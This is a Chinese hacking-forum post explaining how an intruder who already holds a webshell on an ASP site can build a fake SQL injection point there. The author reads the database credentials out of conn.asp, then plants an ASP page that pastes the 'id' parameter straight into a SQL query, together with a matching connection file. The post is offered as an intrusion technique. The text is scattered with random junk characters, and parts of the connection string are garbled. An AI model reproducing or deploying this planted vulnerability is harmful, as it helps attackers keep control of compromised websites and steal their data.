自己构造注入点方便入侵
$ L- v4 f6 y7 D5 M
8 _& h- b Q% F: e( _* ~: X# A0 n今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
" z Y2 X- {( Z% S/ }4 Q& J3 X4 A1 L' x( q
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!$ c8 U* U) J! f- ?; e% u5 T
( Z, X- F! G. K: x% M$ h首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和. H6 Z3 R+ D0 ~6 \7 V4 u
) M3 l+ A0 D/ v3 N- \! s
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
9 J, Q+ y7 N) _9 G/ \. S0 Z3 i- z: m$ r
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
* ] d2 k/ E* S+ o
8 D- S% }: \* t/ i. i T8 f程序代码2 l) y6 n) Y5 v8 h& Z+ Y, H6 j& X# a
<!--#include file="xx.asp"-->9 q e- H/ s- P( d& u5 R0 ^* g
<%
5 I2 j, K- r2 o# U; K! X9 ?7 K& e$ Tset rs=server.createobject("ADODB.recordset")3 v- y( M4 y* i' `# }
id = request("id")
2 b8 G1 x4 J7 z2 W5 F o+ b0 |strSQL = "select * from admin where id=" & id3 V+ J6 u5 H) ?# H: c( S" z
rs.open strSQL,conn,1,3
0 Q& F& k w) O) i$ R5 T$ P% Mrs.close
/ K' w1 B' ]$ a" V, p%>
h4 m: y) U# f. i
- p7 L% v! D: ~& ~+ R9 }& I \, v把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在7 n5 C( S" N/ G& W0 j0 G
. W) p- f1 K9 M& A; G你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
) _( c' z Q+ V9 R1 R
# s$ d `- h5 w7 [& W# n然后就要构造一个连接数据库的文件了,代码如下:
: j }% r5 U% F2 x/ ?程序代码
# v7 t# F, _) T8 W0 d# k1 G<%
4 i9 t$ c4 E( J! s( K7 z5 }3 JstrSQLServerName = "000.000.000.000" '服务器名称或地址
) I4 Q0 N( d" `) t7 |strSQLDBUserName = "sqlname" '数据库帐号1 s i6 G8 a( I3 o+ `* j! M3 A Z
strSQLDBPassword = "sqlpass" '数据库密码' {# P- Q% W8 Y3 Q
strSQLDBName = "sqldataname" '数据库名称, R E9 s" g8 \( |/ A% K
Set conn = Server.CreateObject("ADODB.Connection")
4 Y1 S t6 A5 n9 istrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"% m3 P' [# k$ y6 s0 s
conn.open strCon
/ u, Z( Y* E" ?%>: W1 |9 j2 z( A" t6 q" H* s
2 j2 S0 i: C% p8 ^0 Y这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,5 c" q, {- W7 p0 `
0 S3 x5 ? y9 A! e6 @4 n就这样,正常情况下,就OK了,伪造成功……0 H" t0 T% z9 n d5 x; _
' j- v) ~' e) }8 q+ M9 K1 ? K
如果有什么问题可以提出来大家一起探讨解决。 |